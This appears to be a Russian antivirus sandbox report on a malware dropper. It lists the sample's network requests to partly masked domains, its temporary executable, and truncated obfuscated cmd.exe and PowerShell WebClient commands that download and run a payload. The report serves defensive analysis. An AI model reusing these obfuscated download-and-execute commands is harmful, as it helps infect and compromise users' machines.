Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set p6nQ=6'B%OU_.LG5Fp8d0g kl2IHtxW{vXryQ~)uw@T3\;hb=:o\qAj,}E7MizDsn(4P1mSfcNe-$+C9a&&for %x in (12;45;35;3;62;5;2;8;21;73;44;32;10;50;63;3;29;3;...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\257.exe
Удаляет следующие файлы
- %TEMP%\257.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.co#####formatique.fr/NTi1X8FaTj_MkXQ
- http://ni###ntvora.com/mejMphi6t7Xc
- http://www.pl##ger.ru/ze4QPfAqDmjO
- http://bi####.rise-up.nsk.ru/77W2Ih2deTU
UDP
- DNS ASK co#####formatique.fr
- DNS ASK ni###ntvora.com
- DNS ASK pl##ger.ru
- DNS ASK bi####.rise-up.nsk.ru
- DNS ASK em#######reformasentenerife.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:O\C"set p6nQ=6'B%OU_.LG5Fp8d0g kl2IHtxW{vXryQ~)uw@T3\;hb=:o\qAj,}E7MizDsn(4P1mSfcNe-$+C9a&&for %x in (12;45;35;3;62;5;2;8;21;73;44;32;10;50;63;3;29;3;...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:O/C"set p6nQ=6'B%OU_.LG5Fp8d0g kl2IHtxW{vXryQ~)uw@T3\;hb=:o/qAj,}E7MizDsn(4P1mSfcNe-$+C9a&&for %x in (12;45;35;3;62;5;2;8;21;73;44;32;10;50;63;3;29;3;65;52;65;65;21;4;68;68;48;54;52;44;32;70...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $qnzad='tcfdia';$kcooja=new-object Net.WebClient;$jzhzow='http://www.co#####formatique.fr/NTi1X8FaTj_MkXQ@http://nishantvora.c...
- '<SYSTEM32>\cmd.exe'
